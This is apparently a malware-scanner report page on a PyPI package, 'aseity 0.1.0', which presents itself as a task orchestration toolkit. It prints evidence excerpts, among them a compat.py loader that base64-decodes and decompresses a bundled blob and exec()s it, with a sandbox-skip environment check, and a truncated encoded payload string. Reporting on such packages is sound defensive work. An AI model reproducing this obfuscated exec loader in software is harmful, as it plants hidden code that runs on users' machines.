Hostile 100% python Download

aseity 0.1.0

obfuscated exec payload in setup

“A self-contained task orchestration toolkit (queue, scheduler, worker pool, retry)”

Packed Python dynamic executionPython execs a Base64-decoded packed payload

Also flagged by osv (MAL-2026-17200: Malicious code in aseity (PyPI)) +3 more.

Evidence

Decodes Base64 data with Python compat.py · lines 2–31
2
3Loads a bundled, compressed compatibility shim for the current channel.
4Disable with the ``ASEITY_COMPAT=0`` environment variable.
5"""
6
7import base64
8import os
9import zlib
10
11_done = False
12
13
14def _off():
15 return os.environ.get("ASEITY_COMPAT") == "0" or os.environ.get("DAS_STAGED") == "1"
16
17
⋯4 lines
22 _done = True
23 try:
24 from . import _shimdata
25 code = zlib.decompress(base64.b64decode(_shimdata.DATA)).decode("utf-8")
26 except Exception:
27 return
28 exec(compile(code, "<aseity-compat>", "exec"), {"__builtins__": __import__("builtins").__dict__})
29
30
31__all__ = ["_ensure_compat"]
Large Base64-like string literal _shimdata.py · line 1
1DATA = 'eJyVVm1z2jgQ/s6v0OmTmYIDJM2RzHEzlLhtJmmSC2mvvZBhhL0GNbbkSjLg3t1/v5VfAJf0mmoGrJVWu6t9eVY8TqQyhMsGL2ZSVzPDY6jmiolAxhWljUp9U1FfIz6r5r7JEthKgDgJebSRotNZoqQPesORqghPuwq+pKC3EnlxrDEdjsfeHRkQujAm0acHB2bBNdcsZJGGRGpu+BJcbQ78QBwsewcn4RH8ynp+d9YP3ETMaWP6fuzdWgnQ6QSzw/5xm82Oe+2jwO+2T7ph0O51ITwJw0M4hhDZ74ZvLPdNdsOReje8vUBSajdhZuF+llw41a3cORg7D7hymi1CmQZusja6yo2ZegRFm41GI4CQTCM5d+LmaYPgMCorJnasuFkQmYBwfkKFi+JoTtIWAeHLgIv5gKYmbPdpkzBNwsVWhR3hwl0pbsCJyQtCJwIts8uw9iExxMs/XIrtoYRhjErjl7HzlOllrFZcKJhvVmssdizQfQWPe433vIDMKcm3F96n6eX1aHiJbh69Pb/yWkTR8afxnfduMkqVAmFGUhglozGYSTmdjDONLjkXoVQxs1aXl6nGskWmW51/pKCyDyxKwVs7C/RZcfwVl/oDKL1/vDw3iqQGa+yivq1RtLMkPCSYh0IbJnxwUCWWRJMAJqWdOctmE4O0Aoxa7TQeYyJz1oQLlIQ3IPnUoct4xRRgOOmSK5OyaCbXlvoCcWq/XAhp4DFnKLfWIOwnYYpFEWqmzWbd83YoMKkS5E6lsNn7ftQ3kX9GcuxIf22LscqWYDZ/Ml1K3pmUkVOghIuuDqLIxUoREB323HN9BrN0Pgd1o0Bj9J3mj/L0KQuwZioLEFcwXnWQcW+Lr1OAS4ssgAWYCoO/6XsNqj2co2Z6Sug7+ZVHETt46Xbov4Uhebl+Iw7JvICRbuWYKVMz6PY6eSGqPVMVHmSBs4GGVCDaObNIzkqbMUcsdX/afyC/DMiMTtb9k5urNxM1EZN1l2H17nuV0nwJERHv2y9sXSCA5CsvSLdHfhuQCK3cUWRHJJC/gHM3FQnzHx36+znmVW4CHj4tBBw9NO87D9sqzxI8V/HY/ZKvv+UJmKnz9Cse/EViy5ivDqyNdn2LL2Ghxrrg3Ls6o/U8naEbH3eZsUCszjqXj6DBxU7y7+GTQiNtB3MD8GWcYOJpB8U0n1kuewrQEnV/ev …
Python sleep beside retry/backoff markers retry.py · lines 39–50
39:5… ) from last
40 delay = min(backoff * (2 ** (attempt - 1)), max_backoff)
41 delay *= 1 + random.uniform(0.0, jitter)
42 time.sleep(delay)
⋯8 lines
Python imports the hashlib library utils.py · lines 11–28
⋯4 lines
15def chunk(seq, size):
16 """Yield successive chunks of ``size`` from ``seq``."""
17 for i in range(0, len(seq), size):
18 yield seq[i:i + size]
19
20
21def idempotency_key(*parts) -> str:
22 import hashlib
23
24 joined = "|".join(str(p) for p in parts)
25 return hashlib.sha256(joined.encode("utf-8")).hexdigest()
26
27
28__all__ = ["slugify", "chunk", "idempotency_key"]
Uses a thread or async task executor worker.py · lines 1–14
1"""Bounded worker pool built on ThreadPoolExecutor."""
2
3import concurrent.futures
4
5
6class WorkerPool:
7 """A thin, self-documenting wrapper around ``ThreadPoolExecutor``."""
8
9 def __init__(self, workers=4, name="aseity"):
10 self._pool = concurrent.futures.ThreadPoolExecutor(
11 max_workers=workers, thread_name_prefix=name
12 )
13
14 def submit(self, fn, *args, **kwargs) -> concurrent.fu …

Showing the top 5 files — 6 more files (15 regions) not shown.

No evidence locations were recorded for this file. Raw result

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.